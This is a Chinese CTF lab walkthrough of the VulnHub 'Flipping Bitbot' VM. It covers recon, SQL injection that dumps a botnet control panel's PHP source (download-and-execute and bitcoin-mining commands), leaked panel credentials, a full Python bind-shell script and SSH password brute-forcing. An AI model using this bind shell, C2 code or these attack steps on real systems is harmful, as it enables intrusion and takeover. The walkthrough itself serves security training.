当前位置:网站首页 > 黑客培训 > 正文

CTF靶场系列-Bot Challenges: Flipping Bitbot

freebuffreebuf 2019-08-04 441 0

本文来源:

下载地址

https://download.vulnhub.com/botchallenges/Bitbot.VulnVM-disk1.vmdk.7z

实战演练

下载下来之后,把它添加硬盘上去

image.png

使用netdiscover进行查找靶机的IP

image.png使用nmap对靶机系统进行端口扫描

image.png打开浏览器

image.png

有一个超链接的指引,不过是403

image.png爆破web目录,找到了一个admin.php

image.pngimage.pngSQLMAP走起

POST /admin.php HTTP/1.1 Host: 192.168.0.101 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Referer: http://192.168.0.101/admin.php Content-Type: application/x-www-form-urlencoded Content-Length: 29 Connection: close Cookie: PHPSESSID=pplr8tr3t0333j40ku6k9uq7r7 Upgrade-Insecure-Requests: 1  login=1?php require_once 'config.php'; include 'loginheader.php'; include 'header.php'; include 'submit.php'; echo' table class="tborder" border="0" cellpadding="4" cellspacing="0" style="">  thead> tr> td class="thead" colspan="8"> div>strong>Bot List/strong>/div> /td> /tr> /thead>  tbody style="" id="cat_1_e"> tr> td class="tcat" style="white-space: nowrap;" align="center" width="20">span class="smalltext">strong>ID/strong>/span>/td> td class="tcat" style="white-space: nowrap;" align="center" width="50">span class="smalltext">strong>IPv4 Address/strong>/span>/td> td class="tcat" style="white-space: nowrap;" align="center" width="60">span class="smalltext">strong>Operation System/strong>/span>/td> td class="tcat" style="white-space: nowrap;" align="center" width="60">span class="smalltext">strong>Cores/strong>/span>/td> td class="tcat" style="white-space: nowrap;" align="center" width="50">span class="smalltext">strong>GPU/strong>/span>/td> td class="tcat" style="white-space: nowrap;" align="center" width="60">span class="smalltext">strong>Mining Status/strong>/span>/td> td class="tcat" style="white-space: nowrap;" align="center" width="60">span class="smalltext">strong>Outgoing command/strong>/span>/td> td class="tcat" style="white-space: nowrap;" align="center" width="50">span class="smalltext">strong>Status/strong>/span>/td>/tr>';  $startlimit = '0';  if (isset($_GET['botlist'])  	} 	else 	{ 	$startlimit = intval($_GET['last']); 	} }  	if ($SQL_CONNECTION) 	{ 		  		mysql_select_db($SQL_DATABASE,$SQL_CONNECTION); 		$sql = "SELECT * FROM `bots` WHERE dead != '1' ORDER by id limit " . $startlimit . "," . "$BOT_PAGE_MAX";  		$query = mysql_query($sql); 			 		while($row = mysql_fetch_assoc($query)) 		{ 			$dead = $row['dead']; 			$hwid = $row['hwid']; 			$id = $row['id']; 			$cmd = $row['cmd']; 			$ip = $row['ip']; 			$win = $row['win']; 			$now = strtotime(date('Y-m-d H:i:s')); 			$online = strtotime($row['online']); 			$min = $BOT_CHECKIN_INTERVAL; 			$gap = $now - $min; 			if($online >= $gap){ $active = 'font color="#00CC00">Online/font>';} else{ $active = 'font color="#FF0000">Offline/font>'; mysql_query("update `bots` set `btc` = '0' where `hwid` = '$hwid'");}; 			$version = $row['version']; 			$cpugpu = explode(" ",$row['sysinfo']); 			$cpu = $cpugpu[0]; 			$gpu = $cpugpu[1]; 			$btc = $row['btc']; 			echo 'tr>td class="trow1" style="white-space: nowrap;" align="center">' . $id . '/td>'. 				'td class="trow1" style="white-space: nowrap;" align="center">' . $ip . '/td>'. 				'td class="trow1" style="white-space: nowrap;" align="center">' . $win . '/td>'. 				'td class="trow1" style="white-space: nowrap;" align="center">' . $cpu . '/td>'. 				'td class="trow1" style="white-space: nowrap; max-width: 100px; overflow:hidden;" align="center">' . $gpu . '/td>'. 				'td class="trow1" style="white-space: nowrap;" align="center">'; if($btc == "1"){echo "Yes";} else{ echo "No"; }; echo '/td>'. 				'td class="trow1" style="white-space: nowrap;" align="center">' . $cmd . '/td>'. 				'td class="trow1" style="white-space: nowrap;" align="center">' . $active . '/td>tr>'; 		} 	}  echo ' /tbody> /table>';  $sql = "SELECT * FROM `bots`"; $query = mysql_query($sql); $rows = round(mysql_numrows($query) / intval($BOT_PAGE_MAX), 0) + 1; $lastint = 0; for($i=1;$i$rows;$i++) { 	echo 'a href="./admin.php?botlist=1/a>'; 	$lastint++; }   echo 'br>br>  table class="tborder" border="0" cellpadding="4" cellspacing="0"> thead> tr> td class="thead" colspan="3"> div>strong>Add Command/strong>/div> /td> /tr> /thead>  tbody style="" id="cat_1_e"> tr> td class="tcat" style="white-space: nowrap;" align="center">span class="smalltext">strong>Bot ID/strong>/span>/td> td class="tcat" style="white-space: nowrap;" align="center">span class="smalltext">strong>Command/strong>/span>/td>/tr>  tr>   form action="admin.php" method="get">   input name="addcommand" value="1"type="hidden">    td class="trow1" style="white-space: nowrap;" align="center">';		 echo' select name="botid" > option value="">Choose/option> option value="all">All/option>'; if ($SQL_CONNECTION) 	{ 		mysql_select_db($SQL_DATABASE,$SQL_CONNECTION); 		$sql = "SELECT * FROM `bots` ORDER BY id WHERE dead != '1'"; 		$query = mysql_query($sql); 		while($row = mysql_fetch_assoc($query)) 		{     	$id=$row["id"];    		echo "OPTION VALUE=".$id.">".$id."/option>"; 	 		} 	}  echo' /select>  /td> td class="trow1" white-space: nowrap;" align="Left"> input class="textbox" name="newcommand" style=" width: 85%; margin-top: 4px; margin-left: 15px; margin-right: 15px;" type="text" /> 				input class="button" value="Add" type="submit">/form> /td>/tr> tr> td class="tcat" style="white-space: nowrap;" align="center">span class="smalltext">strong>Start ID | Stop ID/strong>/span>/td> td class="tcat" style="white-space: nowrap;" align="center">span class="smalltext">strong>Command/strong>/span>/td>/tr> tr>   form action="admin.php" method="get">   input name="addcommand" value="1" type="hidden">    td class="trow1" style="white-space: nowrap;" align="center">';		 echo' select name="startid" > option value="">Choose/option>'; if ($SQL_CONNECTION) 	{ 		mysql_select_db($SQL_DATABASE,$SQL_CONNECTION); 		$sql = "SELECT * FROM `bots` ORDER BY id"; 		$query = mysql_query($sql); 		while($row = mysql_fetch_assoc($query)) 		{     	$id=$row["id"];    		echo "OPTION VALUE=".$id.">".$id."/option>"; 	 		} 	}  echo' /select> 		 select name="stopid" > option value="">Choose/option>'; if ($SQL_CONNECTION) 	{ 		mysql_select_db($SQL_DATABASE,$SQL_CONNECTION); 		$sql = "SELECT * FROM `bots` ORDER BY id"; 		$query = mysql_query($sql); 		while($row = mysql_fetch_assoc($query)) 		{     	$id=$row["id"];    		echo "OPTION VALUE=".$id.">".$id."/option>"; 	 		} 	}  echo' /select>  /td> td class="trow1" white-space: nowrap;" align="Left"> input class="textbox" name="newcommand" style=" width: 85%; margin-top: 4px; margin-left: 15px; margin-right: 15px;" type="text" /> 				input class="button" value="Add" type="submit">/form> /td>/tr> /tbody>/table>  br>br>  !-- Command List -->  table class="tborder" border="0" cellpadding="4" cellspacing="0"> thead> tr> td class="thead" colspan="4"> div>strong>Command List/strong>/div> /td> /tr> /thead>  tbody style="" id="cat_1_e"> tr> td class="tcat" style="white-space: nowrap;" align="center" width="40">span class="smalltext">strong>Command/strong>/span>/td> td class="tcat" style="white-space: nowrap;" align="center" width="50">span class="smalltext">strong>Command Description/strong>/span>/td> td class="tcat" style="white-space: nowrap;" align="center" width="55">span class="smalltext">strong>Command Options/strong>/span>/td> td class="tcat" style="white-space: nowrap;" align="center" width="60">span class="smalltext">strong>Command Example/strong>/span>/td> /tr>  tr>td class="trow1" style="white-space: nowrap;" align="center">' . $CMD_DOWNLOAD . '/td>'. 'td class="trow1" style="white-space: nowrap;" align="center"> Downloads and Executes a File/td>'. 'td class="trow1" style="white-space: nowrap;" align="center">' . $CMD_DOWNLOAD . ' [URL]/td>'. 'td class="trow1" style="white-space: nowrap;" align="center">' . $CMD_DOWNLOAD . ' http://www.site.com/file.exe/td>  tr>td class="trow1" style="white-space: nowrap;" align="center">' . $CMD_UPDATE . '/td>'. 'td class="trow1" style="white-space: nowrap;" align="center"> Updates Bot With New File/td>'. 'td class="trow1" style="white-space: nowrap;" align="center">' . $CMD_UPDATE . ' [URL]/td>'. 'td class="trow1" style="white-space: nowrap;" align="center">' . $CMD_UPDATE . ' http://www.site.com/file.exe/td>  tr>td class="trow1" style="white-space: nowrap;" align="center">' . $CMD_REMOVE . '/td>'. 'td class="trow1" style="white-space: nowrap;" align="center"> Removes Bot From System/td>'. 'td class="trow1" style="white-space: nowrap;" align="center">' . $CMD_REMOVE . '/td> td class="trow1" style="white-space: nowrap;" align="center">' . $CMD_REMOVE . '/td>  tr>td class="trow1" style="white-space: nowrap;" align="center">' . $CMD_STOPBTC . '/td>'. 'td class="trow1" style="white-space: nowrap;" align="center"> Stops Bitcoin mining/td>'. 'td class="trow1" style="white-space: nowrap;" align="center">' . $CMD_STOPBTC . '/td> td class="trow1" style="white-space: nowrap;" align="center">' . $CMD_STOPBTC . ' /td>  tr>td class="trow1" style="white-space: nowrap;" align="center">' . $CMD_BTC . '/td>'. 'td class="trow1" style="white-space: nowrap;" align="center"> Starts Bitcoin mining/td>'. 'td class="trow1" style="white-space: nowrap;" align="center">' . $CMD_BTC . '/td> td class="trow1" style="white-space: nowrap;" align="center">' . $CMD_BTC . ' /td>  /tbody>/table> br>br>   !-- Footer -->';  include 'footer.php';  ?> root@kali:~# 

config.php

image.png控制面板登录信息

$ADMIN_USER_NAME = 'botter'; //panel username

$ADMIN_PASSWORD = 'IF I CAME UP WITH UNIQUE PASSWORDS, I WOULD BE HOME BY NOW'; //panel password

登录成功

image.png

这里面有可以下载文件的漏洞

image.png下载反弹shell,修改IP和端口

image.png启动http服务器

image.png下载shell

image.png

发现不行,好像由于是之前SQLMAP跑的时候,跑死了,我重启了一下靶机

image.pngimage.png

有下载记录
image.png

我重新发出了命令,但我仍然无法让它正常工作。

然后我决定稍微改变一下,而不是尝试执行反向shell,我想我会尝试一个绑定shell,这会打开一个我可以netcat到的端口。

我使用了以下python bind-shell脚本并将其保存为python-bind.py,然后重新发出命令以上载此文件并执行它。

#simple python bind shell import os,sys,socket   ls = socket.socket(socket.AF_INET,socket.SOCK_STREAM); print '-Creating socket..' port = 31337 try: 	ls.bind(('', port)) 	print '-Binding the port on '  	ls.listen(1) 	print '-Listening, ' 	(conn, addr) = ls.accept() 	print '-Waiting for connection...' 	cli= conn.fileno() 	print '-Redirecting shell...' 	os.dup2(cli, 0) 	print 'In, ' 	os.dup2(cli, 1) 	print 'Out, ' 	os.dup2(cli, 2) 	print 'Err'	 	print 'Done!' 	arg0='/bin/sh' 	arg1='-a' 	args=[arg0]+[arg1] 	os.execv(arg0, args) except(socket.error): 	print 'fail\n' 	conn.close() 	sys.exit(1)

使用nmap扫描,发现端口开启了

image.png使用nc进行连接

image.png

image.png他这个命令是随机生成一个密码重置

image.png唯一变化就是最后两个数字

image.png也就是说,它的root密码就是前面那些字符+随机两位数字,我们用python生成一下字典

image.png爆破ssh

image.png成功登录

image.png

转载请注明来自网盾网络安全培训,本文标题:《CTF靶场系列-Bot Challenges: Flipping Bitbot》

标签:ctf靶场系列

猜你喜欢

关于我

欢迎关注微信公众号

关于我们

网络安全培训,黑客培训,渗透培训,ctf,攻防

标签列表

Powered By Z-BlogPHP 1.7.3